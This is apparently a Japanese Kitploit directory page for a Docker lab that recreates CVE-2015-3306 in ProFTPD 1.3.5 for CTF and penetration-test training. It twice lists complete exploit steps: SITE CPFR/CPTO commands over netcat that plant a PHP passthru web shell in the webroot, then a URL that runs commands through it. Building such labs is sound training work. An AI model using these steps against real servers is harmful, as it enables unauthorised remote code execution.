Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2015-3306-Home-Lab — CVE-2015-3306 - ProFTPD - RCE ホームラボセットアップ(Docker) - レッドチーム演習やペネトレーションテストに使いやすい | Kitploit
ツール/GitHubGitHub/netw0rk7/cve-2015-3306-home-lab
脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育レッドチーミングラボと実践
GitHubnetw0rk7/cve-2015-3306-home-lab

CVE-2015-3306-Home-Lab

CVE-2015-3306 - ProFTPD - RCE ホームラボセットアップ(Docker) - レッドチーム演習やペネトレーションテストに使いやすい

リポジトリを見る
9ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

ProFTPD 1.3.5 (mod_copy) — RCE シミュレーションラボ

CVE20153306

このラボは、CVE-2015-3306 — ProFTPD mod_copy Remote File Copy to RCE の脆弱性をシミュレートするために設計されています。
ProFTPD の mod_copy モジュールを介した Web Shell Injection RCE の学習用です。


特徴

  • 脆弱性のある ProFTPD 1.3.5
  • mod_copy をフルで有効化 (SITE CPFR / SITE CPTO)
  • Anonymous FTP に対応
  • Web ルート /var/www/html を再現する Apache2 + PHP5
  • 攻撃者は SITE CPFR/CPTO を使用して webroot にファイルをコピーし、RCE を発動できます
  • コンテナ起動のたびに flag_RANDOM.txt を自動生成
  • CTF / Red Team / Pentest トレーニング向けのラボ

ディレクトリ構造

root@kitploit:~
/etc/proftpd/proftpd.conf
/usr/local/proftpd/
/var/www/html/
/tmp/flag_xxx.txt
/entrypoint.sh

使用方法(コンテナの実行)

root@kitploit:~
docker build -t sentinel7-proftpd-lab .
docker run -it --rm -p 21:21 -p 80:80 sentinel7-proftpd-lab

CVE-2015-3306 の脆弱性テスト手順

root@kitploit:~
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>

SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php

ブラウザでアクセス:

root@kitploit:~
http://<IP>/webshell.php?cmd=<command>

フラグ

保存場所:

root@kitploit:~
/tmp/flag_RANDOM.txt

英語版 — ProFTPD 1.3.5 (mod_copy) RCE ラボ

このラボは、mod_copy を備えた ProFTPD 1.3.5 を使用して CVE-2015-3306 をシミュレートし、攻撃者が ProFTPD mod_copy Remote File Copy to RCE を実行できるようにします。


特徴

  • ソースからコンパイルされた脆弱性のある ProFTPD 1.3.5
  • mod_copy 有効 (SITE CPFR + SITE CPTO)
  • Anonymous FTP アクセス
  • Webshell 実行用の Apache2 + PHP5
  • コンテナ起動時に flag_RANDOM.txt を自動生成
  • CTF、教育、エクスプロイト研究に最適

エクスプロイトテスト例

root@kitploit:~
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>

SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php

次に実行:

root@kitploit:~
http://<IP>/webshell.php?cmd=<command>

フラグの場所

root@kitploit:~
/tmp/flag_RANDOM.txt

免責事項

教育目的および許可を得たペネトレーションテストにのみ使用してください。

ツールをダウンロード